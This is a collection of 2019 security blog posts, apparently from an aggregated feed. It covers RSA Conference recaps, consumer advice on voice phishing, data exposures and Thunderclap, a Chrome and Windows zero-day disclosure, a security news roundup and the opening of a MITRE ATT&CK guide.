In its tenth year at the RSA Conference, the CSA Summit welcomed Rajiv Gupta, Senior Vice President, Cloud Security Business Unit at McAfee and Scott Howitt, Senior Vice President & Chief Information Security Officer at MGM Resorts International to the stage. During the keynote, Howitt discussed MGM’s digital transformation and how adopting the cloud into MGM’s business model resulted in delivering a modern experience to customers and more engaged and productive employees. We also heard Gupta share statistics from our Cloud Report on how cloud data distribution has changed dramatically ,which now requires new and better solutions. Before attendees headed out for lunch, Howitt and Gupta closed the first half of the CSA summit by solidifying the positive impact the cloud can have on enterprise businesses. 

Tapping into the Tremendous Power of Artificial Intelligence at RSAC

On Tuesday, SVP and Chief Technology Officer, Steve Grobman and Chief Data Scientist, Dr. Celeste Fralick, took the mainstage at RSAC. During their keynote, Grobman and Fralick discussed how the industry needs to think about artificial intelligence, its power, how it can be used against us and its adversarial uses. Fralick shared how “most people don’t realize how fragile AI and machine learning can really be” and voiced how her team is involved in a technical area called the adversarial machine learning, where they study ways that adversaries can invade or poison machine learning classifier. In closing, Grobman told RSA attendees that “we must embrace AI but never ignore its limitations. It’s just math. It’s fragile. And there is a cost to both false positives and false negatives.”

EXPO- nentially Better

This year’s RSAC expo didn’t disappoint, with over 400 exhibitors showcasing unique content from the world’s top cybersecurity minds and the latest security solutions. Every day our booth was full as we connected with our customers, partners, and prospects. At this year’s conference, we hosted a fun and interactive Capture the Flag challenge which tested the investigative and analytical skills of RSA attendees. Contestants were given various challenges and received “flag” details on how to complete each challenge as quickly and accurately as possible.

RSAC was full of announcements with new and better products along with the buzzing of cybersecurity professionals making better connections with peers from around the world, with the same goal of keeping the digital world safe and making the real world a better place.

The post Artificial Intelligence, Machine Learning and More at RSAC 2019 appeared first on McAfee Blogs.

CNIL’s Google Fine of 50 million Euros

The announcement from CNIL about their decision to fine Google provide a valuable insight into the thinking of Supervisory Authorities when it comes to transparency (notice) and consent. Google’s vulnerability to fine is attributed to the complexity of their privacy notice and terms of service. The information a user may wish to find was scattered […]

The post CNIL’s Google Fine of 50 million Euros appeared first on Privacy Ref Blog.

You Rang? New Voice Phishing Attack Tricks Unsuspecting Users

In this digital day and age, the average user is likely familiar with the techniques and avenues cybercriminals use to get ahold of personal data and money. With this knowledge, we’ve become smarter and keen to the tricks of the cybercrime trade. However, cybercriminals have become smarter too, and therefore their attacks have become more complex. Take phishing, for example. There has been a dramatic shift in phishing attacks, from simple and general to complex and personalized. What was once spoofing emails or websites has now evolved into something more devious – vishing, or voice phishing. This method involves a cybercriminal attempting to gain access to a victim’s personal or financial information by pretending to be a financial institution via phone call. And now a new vishing attack is proving to be more difficult to detect than the typical phishing scams.

In April 2018, Min-Chang Jang, a manager at Korea Financial Security Institute and Korea University, made a breakthrough in his investigation into malicious apps designed to intercept calls to users from legitimate numbers. This tactic puts a new but troubling twist on the original voice phishing cyberattack. To be successful in this venture, a hacker must first convince a user to download a fake app. To do this, a link is sent to the victim, luring them in with an amazing offer around loan refinancing or something similar, which then prompts the user to download the faulty app. If the target takes the bait, calls will start to come in from the financial institution following up on the possible loan refinancing offer. The call, however, isn’t connected to the actual financial company, rather it is intercepted and connected to the bad actor.

We know that as we adjust to the world around us and become smarter about our security, cybercriminals will do the same with their thievery. Today it’s an advanced vishing attack, tomorrow it could be a different type of phishing vector. However, users can rest assured that companies like McAfee are working tirelessly to ensure our users can thwart any cyberattack that comes their way. While this voice phishing attack is hard to detect, here are some proactive steps you can take to ensure you don’t fall victim to cybercriminals’ schemes:

  • Only install apps from authorized sources. To avoid malicious apps getting ahold of your data, only download apps from authorized vendors. For Android users, use the Google Play Store. For iPhone users, use the Apple App Store. Never trust a third-party app with information that could be exploited in the wrong hands.
  • Turn on caller ID or other services. Numerous carriers now offer free services that notify users of possible scam calls. And a lot of phones come with call-identifying capabilities that can give the user a quick diagnostic of whether the call is legitimate or not. With this feature, users can report scam calls to a database too.
  • Always think twice. In addition to tips and apps, there’s no better judge than common sense so if an offer or deal sounds too good to be true, it most likely is.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post You Rang? New Voice Phishing Attack Tricks Unsuspecting Users appeared first on McAfee Blogs.

Security roundup: March 2019

We round up interesting research and reporting about security and privacy from around the web. This month: ransomware repercussions, reporting cybercrime, vulnerability volume, everyone’s noticing privacy, and feeling GDPR’s impact.

Ransom vs ruin

Hypothetical question: how long would your business hold out before paying to make a ransomware infection go away? For Apex Human Capital Management, a US payroll software company with hundreds of customers, it was less than three days. Apex confirmed the incident, but didn’t say how much it paid or reveal which strain of ransomware was involved.

Interestingly, the story suggests that the decision to pay was a consensus between the company and two external security firms. This could be because the ransomware also encrypted data at Apex’s newly minted external disaster recovery site. Most security experts strongly advise against paying extortionists to remove ransomware. With that in mind, here’s our guide to preventing ransomware. We also recommend visiting NoMoreRansom.org, which has information about infections and free decryption tools.

Bonus extra salutary security lesson: while we’re on the subject of backup failure, a “catastrophic” attack wiped the primary and backup systems of the secure email provider VFE Systems. Effectively, the lack of backup put the company out of business. As Brian Honan noted in the SANS newsletter, this case shows the impact of badly designed disaster recovery procedures.

Ready to report

If you’ve had a genuine security incident – neat segue alert! – you’ll probably need to report it to someone. That entity might be your local CERT (computer emergency response team), to a regulator, or even law enforcement. (It’s called cybercrime for a reason, after all). Security researcher Bart Blaze has developed a template for reporting a cybercrime incident which you might find useful. It’s free to download at Peerlyst (sign-in required).

By definition, a security incident will involve someone deliberately or accidentally taking advantage of a gap in an organisation’s defences. Help Net Security recently carried an op-ed arguing that it’s worth accepting that your network will be infiltrated or compromised. The key to recovering faster involves a shift in mindset and strategy from focusing on prevention to resilience. You can read the piece here. At BH Consulting, we’re big believers in the concept of resilience in security. We’ve blogged about it several times over the past year, including posts like this.

In incident response and in many aspects of security, communication will play a key role. So another helpful resource is this primer on communicating security subjects with non-experts, courtesy of SANS’ Lenny Zeltser. It takes a “plain English” approach to the subject and includes other links to help security professionals improve their messaging. Similarly, this post from Raconteur looks at language as the key to improving collaboration between a CISO and the board.

Old flaws in not-so-new bottles

More than 80 per cent of enterprise IT systems have at least one flaw listed on the Common Vulnerabilities and Exposures (CVE) list. One in five systems have more than ten such unpatched vulnerabilities. Those are some of the headline findings in the 2019 Vulnerability Statistics Report from Irish security company Edgescan.

Edgescan concluded that the average window of exposure for critical web application vulnerabilities is 69 days. Per the report, an average enterprise takes around 69 days to patch a critical vulnerability in its applications and 65 days to patch the same in its infrastructure layers. High-risk and medium-risk vulnerabilities in enterprise applications take up to 83 days and 74 days respectively to patch.

SC Magazine’s take was that many of the problems in the report come from companies lacking full visibility of all their IT assets. The full Edgescan report has even more data and conclusions and is free to download here.

From a shrug to a shun

Privacy practitioners take note: consumer attitudes to security breaches appear to be shifting at last. PCI Pal, a payment security company, found that 62 per cent of Americans and 44 per cent of Britons claim they will stop spending with a brand for several months following a hack or breach. The reputational hit from a security incident could be greater than the cost of repair. In a related story, security journalist Zack Whittaker has taken issue with the hollow promise of websites everywhere. You know the one: “We take your privacy seriously.”

If you notice this notice…

Notifications of data breaches have increased since GDPR came into force. The European Commission has revealed that companies made more than 41,000 data breach notifications in the six-month period since May 25. Individuals or organisations made more than 95,000 complaints, mostly relating to telemarketing, promotional emails and video surveillance. Help Net Security has a good writeup of the findings here.

It was a similar story in Ireland, where the Data Protection Commission saw a 70 per cent increase in reported valid data security breaches, and a 56 per cent increase in public complaints compared to 2017. The summary data is here and the full 104-page report is free to download.

Meanwhile, Brave, the privacy-focused browser developer, argues that GDPR doesn’t make doing business harder for a small company. “In fact, if purpose limitation is enforced, GDPR levels the playing field versus large digital players,” said chief policy officer Johnny Ryan.

Interesting footnote: a US insurance company, Coalition, has begun offering GDPR-specific coverage. Dark Reading’s quotes a lawyer who said insurance might be effective for risk transference but it’s untested. Much will depend on the policy’s wording, the lawyer said.

Things we liked

Lisa Forte’s excellent post draws parallels between online radicalisation and cybercrime. MORE

Want to do some malware analysis? Here’s how to set up a Windows VM for it. MORE

You give apps personal information. Then they tell Facebook (PAYWALL). MORE

Ever wondered how cybercriminals turn their digital gains into cold, hard cash? MORE

This 190-second video explains cybercrime to a layperson without using computers. MORE

Blaming the user for security failings is a dereliction of responsibility, argues Ira Winkler. MORE

Tips for improving cyber risk management. MORE

Here’s what happens when you set up an IoT camera as a honeypot. MORE

The post Security roundup: March 2019 appeared first on BH Consulting.

Learning from the Big Data Breaches of 2018

Guest article by Cybersecurity Professionals

What can we learn from the major data breaches of 2018?
2018 was a major year for cybersecurity. With the introduction of GDPR, the public’s awareness of their cyber identities has vastly increased – and the threat of vulnerability along with it. The Information Commissioner’s Office received an increased number of complaints this year and the news was filled with reports of multi-national and multi-millionaire businesses suffering dramatic breaches at the hand of cybercriminals.

2018 Data Breaches
Notable breaches last year include:

5. British Airways
The card details of 380,000 customers were left vulnerable after a hack affected bookings on BA’s website and app. The company insists that no customer’s card details have been used illegally but they are expected to suffer a major loss of money in revenue and fines as a result of the attack.

4. T-Mobile
Almost 2 million users had their personal data, including billing information and email addresses accessed through an API by an international group of hackers last August.

3. Timehop
A vulnerability in the app’s cloud computing account meant that the names and contact details of 21 million users were affected on Timehop. The company assured users that memories were only shared on the day and deleted after, meaning that the hackers were not able to access their Facebook and Twitter history.

2. Facebook & Cambridge Analytica
One of the most sensationalised news stories of the last year, Facebook suffered a string of scandals after it was released that analytics firm Cambridge Analytica had used the Facebook profile data of 87 million users in an attempt to influence President Trump’s campaign and potentially aid the Vote Leave campaign in the UK-EU referendum.

1. Quora
After a “malicious third party” accessed Quora’s system, the account information, including passwords, names and email addresses, of 100 million users was compromised. The breach was discovered in November 2018.

GDPR
As the UK made the switch from the Data Protection Act to GDPR, businesses and internet users across the country suddenly became more aware of their internet identities and their rights pertaining to how businesses handled their information.

With the responsibility now firmly on the business to protect the data of UK citizens, companies are expected to keep a much higher standard of security in order to protect all personal data of their clients.

How many complaints to the ICO?
Elizabeth Denham, the UK’s Information Commissioner, said that the year 2017-18 was ‘one of increasing activity and challenging actions, some unexpected, for the office’.

This is shown in an increase in data protection complaints by 15%, as well as an increase in self-reported breaches by 30%. Since this is the first year of GDPR, it is expected that self-reported breaches have increased as businesses work to insure themselves against much higher fines for putting off their announcement.

The ICO also reports 19 criminal prosecutions and 18 convictions last year and fines totalling £1.29 million for serious security failures under the Data Protection Act 1998. The office has assured that they don’t intend to make an example of firms reporting data breaches in the early period of GDPR but as time goes on, leniency is likely to fade as businesses settle into the higher standards.

What does it mean for SMEs?
With 36% of SMEs having no cybersecurity plan, the general consensus is that they make for unpopular targets. However, with the GDPR, the responsibility is on the business to protect their data so being vulnerable could result in business-destroying costs. Considering the cost to businesses could total the higher of 2% of annual turnover or €10 million, data protection is of paramount importance to small businesses.

How exposed are we in the UK?
At 31%, our vulnerability rating is higher than the Netherlands, Germany, Estonia (30%) and Finland (29%), but the UK is a more likely target for cybercriminals looking to exploit high tech and financial services industries, which are some of the most vulnerable across Great Britain.

Despite a higher level of vulnerability, the UK has one of the largest cyber security talent pools, showing there is time and manpower being dedicated to the protection of our data online.

https://www.cybersecurity-professionals.com/blog/2019/03/01/cybercrime-in-the-uk-infographic/

How to Make Sure Spring Break Doesn’t Wreck Your Digital Rep

Spring Break and reputation management

Spring Break and reputation management Spring Break 2019 is in full swing, which means high school and college kids have hit the road determined to make this rite of passage epic. Unfortunately, not everyone will return home with his or her online reputation intact.

Despite the headlines and warnings, kids are still uploading their lives 24/7 and not all of their choices will be wise. While impressive at the moment, showcasing one’s exceptional beer pong or body shot skills could become a future digital skeleton.

Define it

The decision to share reckless content online has damaged (even destroyed) scholarships, opportunities, reputations, and careers.

Each day more than one billion names are searched on Google, and 77% of job recruiters look up potential employees up online during the hiring process, according to BrandYourself.com. Also, 45% of people have found content in an online search that made them decide not to do business with someone.

As elementary as it sounds, the first step to helping your child safeguard his or her online reputation this spring break is defining what is and is not appropriate online content.

Spring Break and reputation management

Technology has created a chasm between generations so don’t assume your values align with your child’s in this area. Behavior once considered inappropriate has slowly become acceptable to kids who grew up in the online space. Also, peers often have far more influence than parents.

So take the time to define (and come to an agreement on) content you consider off limits such as profanity, racy photos, mean, disrespectful, or racist comments, irresponsible or prank videos, or pictures that include alcohol or drug use. (Yes, state the obvious!)

Untag It

Spring Break and reputation management

Turn off tagging. Like it or not, people often judged us by the company we keep. Your child’s online behavior may be stellar but tag-happy, reckless friends can sink that quickly. To make sure your child doesn’t get tagged in risky photos on Twitter, Instagram, or Facebook, encourage them to adjust privacy settings to prevent tagging or require user approval. Also, help your kids to pay more attention to unflattering Snapchat photos and Snapchat story photos that other people post about them that can be problematic if shared elsewhere.

Lock It

Amp privacy settings. By adjusting privacy settings to “friends only” on select social networks content, digital mistakes can be minimized. However, we know that anything uploaded can be shared and screen captured before it’s deleted so tightening privacy settings isn’t a guarantee.

Google It

Spring Break and reputation management To get a clear picture of your child’s digital footprint and what a school or future employer might find, Google your child’s name. Examine the social networks, links, and sites that have cataloged information about your child. One of the best ways to replace damaging digital information is by creating positive information that overshadows it. Encourage your child to set up a Facebook page that reflects their best self — their values, their goals, and their character. Make the page public so others can view it. They may also consider setting up a LinkedIn page that highlights specific achievements, goals, and online endorsements from teachers and past employers.

If for some reason there’s damaging content that can’t be removed by request, encourage your child to set up a personal website and blog weekly. This can be a professional or hobby blog, but the idea is to repopulate the search results with favorable content and push the tainted content further down on Google.

Balance It

In your guiding, don’t forget the wise words of Cyndi Lauper who reminds us all, “Girls just wanna have fun!” Strive for balance in giving kids the room to make memories with friends while at the same time equipping them to make wise choices online.

The post How to Make Sure Spring Break Doesn’t Wreck Your Digital Rep appeared first on McAfee Blogs.

809 Million Records Left Exposed: How Users Can Protect Their Data

It’s no secret that technological advancements and online threats are directly proportional to each other. So now more than ever, it’s imperative that users prioritize the security of their digital presence, especially in the face of advanced malware attacks and massive data leaks. Speaking of the latter — less than two months after the Collection #1 data breach exposed 773 million email addresses, it seems we have another massive data dump in our midst. Last week, researchers discovered a 150-gigabyte database containing 809 million records exposed by the email validation firm, Verifications.io.

You may be wondering how Verifications.io had so much data left to be exposed. Most people have heard of email marketing, but very few realize that these companies often vet user email addresses to ensure their validity. Enter Verifications.io. This company serves as a way email marketing firms can outsource the extensive work involved with validating mass amounts of emails and avoid the risk of having their infrastructure blacklisted by spam filters. Verifications.io was entrusted with a lot of data provided by email marketing firms looking to streamline their processes, creating an information-heavy database.

This unusual data trove contains tons of sensitive information like names, email addresses, phone numbers, physical addresses, gender, date of birth, personal mortgage amounts, interest rates, social media accounts, and characterizations of people’s credit scores. While the data doesn’t contain Social Security Numbers or credit card information, that amount of aggregated data makes it much easier for cybercriminals to run new social engineering scams or expand their target audience. According to security researcher Troy Hunt, owner of HaveIBeenPwned, 35% of the data exposed by Verifications.io is new to his database. With that said, it was the second largest data dump added in terms of email addresses to Hunt’s website, which allows users to check whether their data has been exposed or breached.

Upon discovery, the firm was made aware of the incident. And while proper security measures were taken, users can take various steps themselves to protect their information in the event of largescale data exposure. Check out the following tips:

  • Be vigilant when monitoring your personal and financial data. A good way to determine whether your data has been exposed or compromised is to closely monitor your online accounts. If you see anything fishy, take extra precautions by updating your privacy settings, changing your password, or using two-factor authentication.
  • Use strong, unique passwords. Make sure to use complex passwords for each of your individual accounts, and never reuse your credentials across different platforms. It’s also a good idea to update your passwords on a consistent basis to further protect your data.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 809 Million Records Left Exposed: How Users Can Protect Their Data appeared first on McAfee Blogs.

RSA Conference 2019: A Recap

RSA is pretty amazing! I’ve been to a lot of security and tech conferences over the years, but somehow always missed the train to RSA. The show is absolutely massive, and involves an entire week of tradeoffs for an attendee – do you walk the expo hall for hours on end? Meet with customers? New prospects? Attend the sessions? Analysts? Write content? Promote on social media? Network with new vendors and partners? Or eat lunch? There is nowhere near enough time to do everything you want to do (I’ll cover a recommendation for this at the end), and RSA has so much to offer.

I had a fantastic week in San Francisco (minus the weather, I think we all could have done without that). I learned a lot while I was here and wish, like many, I had more time to do it. However, I’m flying home tomorrow, and I’m absolutely exhausted, so a weekend at home, with the peace and quiet, and catching up on some work emails is very welcoming!

Another interesting thing, from a vendor perspective, is that there are two sides to a conference like this. There is the work happening at the conference itself (keynotes, sessions, and vendor booths), and then there is everything happening adjacent to it (networking, customer meetings, and business partnerships). And every single person here, the 40K+ attendees, are all on their own missions; it’s inspiring to see the drive behind everyone’s eyes.

If you’re on LinkedIn, connect with me, and let me know how RSA was for you!

Themes

RSA had a lot of themes that were presented both purposefully, and by accident in the market shifts represented by the vendor booths. The first set of themes were set by the keynote address, specifically that “we are better together,” that AI and humans together is critical to the future, and that trust moving forward is going to be make or break our future. 

The importance of diversity and inclusion in the security industry also surfaced through many conversations. Walking the show floor, it’s amazing to see how far we have come in our efforts to include people of different backgrounds. But while we have made a lot of progress, there is still a lot of work to be done here. 

The last major theme that played out, similar to “better together,” is that none of us are alone. While our market may be fiercely competitive at times, we ultimately are all moving towards the same goals: to protect ourselves, our customers, our data, our people, and our country. The honor and pride in the work that we do is incredible. There will be trying times, there will be breaches, there will be cyberattacks, and in those moments, we have to remember that none of us are alone in these efforts.

Takeaways

There is no shortage of security companies, and the evolution of technology is at a break-neck pace. So many new companies were on the RSA expo floor, with leading-edge technology, cool stories to tell, and a lot of fun designs. Standing out at the expo hall is no easy task.

We have to continue our efforts on the diversity and inclusion fronts, and every company must make a conscious effort to do so. Again, we’ve made a lot of progress, but we still have a long way to go. We need to make security sound as cool as it really is, and encourage the youngest generations to get involved.

The world is changing rapidly! Cyberattacks are becoming more frequent, and the rate at which they’re changing their patterns is accelerating. The private sector is going to have a hard time keeping up with state-sponsored attacks, and the industry could do with more collaborative, cross-business work.

There is a lot of noise in the marketplace. So many vendors solving the same problems, but in slightly different ways. As a product marketer, this is ripe with opportunity! Product marketers of the world: please understand your buyers’ needs and bring to the forefront exactly how your business solves those problems – and then go after that market. Make it crystal clear! Again, in the spirit of “better together,” connect with me on LinkedIn if you’re not sure how to go about that. 

Veracode’s Presence

I have to spend a little bit of time talking about Veracode at RSA this year. We came full force! We brought an army of Veracoders to RSA this year, from all different departments and with a variety of backgrounds. We had a really large booth with a ton of traffic all week. We were thrilled to have Sophia, the world’s first humanoid robot, join us to answer attendees’ questions. We met with thousands of people, held hundreds of meetings, handed out a ton of customized t-shirts, conducted demos, and had some of our brightest minds present on a number of topics, like how to make security part of your competitive edge. Veracode launched its refreshed branding, with a new focus on YOU! You, our customers, are the ones that are changing this world – we’re just helping you secure it. We worked really hard all week, but we had a lot of fun doing it. And if you saw some Veracoders and want to be part of something amazing, come see what it’s all about.

Recommendations

Since this was my first year at RSA, there are a few things I would do differently – so let me share with you a few recommendations, both from a vendor perspective and an attendee’s perspective.

Vendors with booths, especially the smaller ones, make sure what you do and your differentiating value proposition are front and center. Bigger companies can get away with a little more ambiguity, because the booths are so big. Your buyers are walking by, and with over 300 booths to choose from, and no time to do it, you have to make sure that in the THREE seconds it takes to walk by – your potential buyers knows you can solve a specific pain point they have.

Attendees – plan, plan, plan. Start with what you want to get out of RSA, and then make sure everything you do centers around that. You are not going to be able to do it all, so you’re better off focusing on one or two areas, and going all in on those. Make sure you have a schedule and that it’s really locked down, and leave time to walk the show floor – it’s fun! 

Vendors and attendees: Please remember to take care of yourselves and each other. We are all just humans after all. Remember to eat, go for that run in the morning, take that bath in the evening, watch your favorite show, and get some much-needed rest. Don’t forsake your health. You will be on your feet all day, so make sure you’re healthy. Oh, and try to wear comfortable shoes! You’re going to be on your feet a lot. 

Stay tuned for more from RSA … in 2020! In the meantime, learn more about Veracode.

Don’t Let Thunderclap Flaws Strike Your Device

If you own a Mac or PC, odds are you’ve used your laptop’s Thunderbolt port to connect another device to your machine. Thunderbolt ports are convenient for charging other devices using your laptop or desktop’s battery power. However, a new flaw called Thunderclap allows attackers to steal sensitive information such as passwords, encryption keys, financial information, or run detrimental code on the system if a malicious device is plugged into a machine’s port while it’s running.

So, how can attackers exploit this flaw? Thunderbolt accessories are granted direct-memory access (DMA), which is a method of transferring data from a computer’s random-access memory (RAM) to another part of the computer without it needing to pass through the central processing unit (CPU). DMA can save processing time and is a more efficient way to move data from the computer’s memory to other devices. However, attackers with physical access to the computer can take advantage of DMA by running arbitrary code on the device plugged into the Thunderbolt port. This allows criminals to steal sensitive data from the computer. Mind you, Thunderclap vulnerabilities also provide cybercriminals with direct and unlimited access to the machine’s memory, allowing for greater malicious activity.

Thunderclap-based attacks can be carried out with either specially built malicious peripheral devices or common devices such as projectors or chargers that have been altered to automatically attack the host they are connected to. What’s more, they can compromise a vulnerable computer in just a matter of seconds. Researchers who discovered this vulnerability informed manufacturers and fixes have been deployed, but it’s always good to take extra precautions. So, here are some ways users can defend themselves against these flaws:

  • Disable the Thunderbolt interface on your computer. To remove Thunderbolt accessibility on a Mac, go to the Network Preference panel, click “OK” on the New Interface Detected dialog, and select “Thunderbolt Bridge” from the sidebar. Click the [-] button to delete the option as a networking interface and choose “Apply.” PCs often allow users to disable Thunderbolt in BIOS or UEFI firmware settings, which connect a computer’s firmware to its operating system.
  • Don’t leave your computer unattended. Because this flaw requires a cybercriminal to have physical access to your device, make sure you keep a close eye on your laptop or PC to ensure no one can plug anything into your machine without permission.
  • Don’t borrow chargers or use publicly available charging stations. Public chargers may have been maliciously altered without your knowledge, so always use your own computer accessories.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Don’t Let Thunderclap Flaws Strike Your Device appeared first on McAfee Blogs.

Live From RSA: Diversity and Inclusion

At one of the keynote addresses at RSA, the opening speaker asked that everyone who identifies as a woman in the audience stand up. It was amazing to see how many women there were at the conference, but we have a long way to go.

Veracode has an incredibly diverse employee base, which makes working here a great experience. We don’t have men and women, we have “Veracoders,” and we take that pretty seriously. We are a women-led organization, with Sam King as our CEO. I am on the product strategy team, and more than half of our department is women. We have an incredible mix of races, religions, backgrounds, ages, and political viewpoints – and everyone respects each other no matter who they are or where they came from. Veracode also has a diversity and inclusion team that seeks to ensure we stay honest about our direction as a company and continues to push through barriers as often as possible.

I attended a great diversity and inclusion panel at RSA this year, where a resonating theme was “Diversity is a fact, but inclusion is a choice.” This panel had CISO/CSO representation from Xerox, ADP, United Airlines, and JP Morgan Chase – all companies that strive to take diversity and inclusion seriously.

Diversity and inclusion starts well before the employee is working in a company. It’s important to build the talent pipeline from an early age with programs that ensure diverse individuals have opportunities to grow and learn in STEM fields. Diversity and inclusion has to be something that you don’t accidently fall into, it has to be a deliberate and thoughtful initiative in the company. A really awesome takeaway is that we could work to change the narrative around the security industry. We always idealize doctors, lawyers, and athletes for kids on TV shows and in movies, but telling a child that you are a CISO is boring. So one of the panelists says she tells kids she’s a “Professional Hacker,” and their eyes grow wide! I think that’s a really interesting approach, and we could work as an industry to make this field sound as cool and important as it really is!

One of the hardest questions the panel tried to answer was around the impact that diversity and inclusion has on the success of a business. They said there isn’t a really great way to measure this in terms of a trackable number. One of the recommendations was to have regular surveys on how people feel in their job – how comfortable they are in their role, how included they feel, and if they feel supported and have a path up and forward. 

In summary, the main takeaways were:

  • Ensure that as an industry we are building the talent pipeline from a very early age, so that people from diverse backgrounds pursue careers in security.
  • Companies must have more than just policies on diversity, they need a purposeful mission driven by a team in the company.

Ensure there is a plan for each and every employee to grow and feel like a partner with the business.

Stay tuned for more from RSA ...

Weekly Update 129

Weekly Update 129

Heaps of stuff going on this week with all sorts of different bits and pieces. I bought a massive new stash of HIBP stickers (1ok oughta last... a few weeks?), I'll be giving them out at a heap of upcoming events, I was on the Darknet Diaries podcast (which is epic!) plus there's more insights into the ShareThis data breach and the ginormous verifications.io incident. Oh - and Udemy is still pirating my content, here's the tweet if you'd like to let them know how you feel about that:

Next week I'll be coming from the US, either Denver or New York depending on how time goes. I'm sure not much will happen between now and then...

Weekly Update 129
Weekly Update 129
Weekly Update 129

References

  1. I was on the Darknet Diaries podcast about the RockYou data breach (add this one to your regular list, Jack does a fantastic job of it)
  2. The ShareThis breach had people in there who never expected to be in there (that's a link to last week's weekly update, check out the comments there for more info)
  3. There's now 763 million more records in HIBP (you didn't give your data to verifications.io and neither did I, but they left it all sitting there open to the world)
  4. Udemy has got a long history of pirating and selling other people's content (no, they're not like YouTube, not unless they want to drop the facade of being a platform with quality content)
  5. Twilio is sponsoring my blog again this week (check out their stuff on implementing 2FA, it can be dead easy)

Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry

cloudbric biterry crypto wallet service security

Cloudbric is pleased to announce it has recently signed an MOU with Bitberry, an easy and safe crypto wallet run by RootOne.

As a subsidiary of Dunamu, the main company behind Korea’s largest cryptocurrency exchange Upbit, RootOne developed the Bitberry mobile app wallet to safeguard the crypto assets of users and to make it easy for users to send payments through phone numbers or email without any need to store private keys.

Currently, Bitberry has over 30 cryptocurrencies (more coming soon) available to store and send on its mobile app. Most recently, the global version has been released with both Android and iOS versions are available for download.  

Working with reputable companies is critical for Cloudbric in growing its service. Through this partnership, Cloudbric will work with Bitberry in interchanging cyber threat data, specifically fraudulent wallet addresses for Cloudbric’s soon to launch Threat Database.

Cloudbric aims to use this cyber threat intelligence for the development of its security platform and crypto asset protection service. Additionally, we will work together to create a safer crypto wallet service and will make the CLB token available through Bitberry’s platform in the future, enabling the payment of services with CLB.

Already Cloudbric provided security to various crypto exchanges and wallet services. As we move forward, the team will continue working in the blockchain security field.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Cloudbric Shows Crypto Wallet Security Prowess With Latest Partnership with Bitberry appeared first on Cloudbric.

Disclosing vulnerabilities to protect users across platforms



On Wednesday, February 27th, we reported two 0-day vulnerabilities — previously publicly-unknown vulnerabilities — one affecting Google Chrome and another in Microsoft Windows that were being exploited together.

To remediate the Chrome vulnerability (CVE-2019-5786), Google released an update for all Chrome platforms on March 1; this update was pushed through Chrome auto-update. We encourage users to verify that Chrome auto-update has already updated Chrome to 72.0.3626.121 or later.

The second vulnerability was in Microsoft Windows. It is a local privilege escalation in the Windows win32k.sys kernel driver that can be used as a security sandbox escape. The vulnerability is a NULL pointer dereference in win32k!MNGetpItemFromIndex when NtUserMNDragOver() system call is called under specific circumstances.

We strongly believe this vulnerability may only be exploitable on Windows 7 due to recent exploit mitigations added in newer versions of Windows. To date, we have only observed active exploitation against Windows 7 32-bit systems.

Pursuant to Google’s vulnerability disclosure policy, when we discovered the vulnerability we reported it to Microsoft. Today, also in compliance with our policy, we are publicly disclosing its existence, because it is a serious vulnerability in Windows that we know was being actively exploited in targeted attacks. The unpatched Windows vulnerability can still be used to elevate privileges or combined with another browser vulnerability to evade security sandboxes. Microsoft have told us they are working on a fix.

As mitigation advice for this vulnerability users should consider upgrading to Windows 10 if they are still running an older version of Windows, and to apply Windows patches from Microsoft when they become available. We will update this post when they are available.

Live From RSA: In a World Changed by Software, Make Security Your Competitive Advantage

At RSA, our own CEO Sam King and CTO Chris Wysopal presented to a roomful of intrigued attendees on how software has completely changed the way businesses tackle problems, how companies work everyday to change our world, and how doing so in a secure manner provides these companies with a competitive edge in the marketplace.

They key takeaway, if you read nothing else is this: Companies leverage software to rapidly solve life-changing problems in innovative ways, but the speed of doing so means nothing if the software you build is insecure. Companies build their own competitive advantage by staying agile. And if companies have to drop everything in order to deal with a security breach, they lose all of the competitive advantage they worked so hard to build. So companies must work to make security part of the competitive advantage that helps them change the world.

When we think about software, it’s easy to default to thinking about browsers, word processing software, and accounting programs. We forget that software also powers many life-critical things. The agricultural industry leverages software to ensure that the right amount of irrigation is used based on the saturation of the soil. Healthcare companies leverage software to find new cures and supply the right amount of medicine. Weather companies leverage software to better predict severe storms in order to warn people in the damaging path. 

You are leveraging software to change the world for the better, every single day. We want to make sure that the work you’re doing doesn’t become undone, because we need you, our country needs you, and our entire human civilization needs you.

Sam and Chris talked about how the entire world of software itself has changed, with a greater focus on automation. Chris painted a picture of the three waves of automation that we have undergone. The first being the automation of back-end systems, like financial programs. Then we experienced front-end automation, like e-commerce stores. Finally, we are now in the automation phase of software, augmenting everything else from medicine to the space program.

So to stay up to speed with the rate of change, to keep your competitive advantage, and to continue changing the world – you have to implement security practices in your software development processes. And the security needs to be automated, integrated into developer tools, and help facilitate actual fixing of the code (after all, a list of security issues is nothing more than a list if they never get fixed, and what good is that?)

Everyday you’re changing the world, we’ll help you secure it in the process.

Stay tuned for more from RSA …

Deriving value from the MITRE ATT&CK Threat Model

The MITRE ATT&CK knowledge base continues to gain traction as the defacto source for supporting business threat assessing, developing proactive cybersecurity and cyber resilience strategies. ATT&CK provides a defined understanding of the adversaries, their associated tactics, their techniques and procedures (TTPs). The ATT&CK comprehensive knowledge base of adversary tactics and techniques has been built up using real-world observations and is freely available to use. 
There are many ways in which organisations can benefit from ATT&CK, often dependant on an organisation's security capabilities and the general security maturity. Steve Rivers, Technical Director International at ThreatQuotient has written guidance on the MITRE ATT&CK stages of maturity, so that any organisation can derive value from it.

MITRE ATT&CK Framework: Keep your friends close, but your enemies even closer

Steve Rivers, Technical Director International at ThreatQuotient

So, how can you get started and use the framework? Nearly every organisation is interested in using MITRE ATT&amp;CK, but they have different views on how it should be adopted based the capabilities of their security operations. We need to make sure that the MITRE ATT&amp;CK framework doesn’t become another source of threat data that is not fully utilised, or a passing fad, or a tool that only the most sophisticated security operations teams can apply effectively. To avoid this fate, we must look at ways to map the framework to stages of maturity so that every organisation can derive value. Here are a few examples of how to use the framework with appropriate use cases as maturity levels evolve.

Stage 1: Reference and Data Enrichment

